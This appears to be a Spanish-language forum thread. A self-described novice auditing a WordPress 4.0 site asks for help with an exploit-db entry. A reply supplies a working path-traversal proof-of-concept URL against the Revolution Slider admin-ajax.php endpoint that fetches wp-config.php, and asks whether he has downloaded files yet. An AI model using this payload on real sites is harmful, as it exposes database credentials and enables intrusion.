ayuda con este exploit

[spinetta]

Hola, estoy auditando una pagina web que utiliza word press 4.0, buscando en la famosa  base de datos de exploit me encontre con este, http://www.exploit-db.com/exploits/34511/
me llamo la atencion porque encontre una pagina que estaba prohibida en robotos.txt osea que esta pagina no quiere que los buscadores la encuentren, la pagina es wp-admin/admin-ajax.php   y en este exploit se hace mencion a ella.
otra cosa que me serviria , es que si no concen este exploit me digan otro que conozcan. Porque no tengo experiencia en el tema, Gracias !

[ameise_1987]

Estimado,

bajo los dorks se encuentra el poc del exploit,

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

ésto nos dice que el parámetro vulnerable es img y desde ahí debes llamar los archivos para descargar, intentaste descargar algún archivo ?? .


saludos!.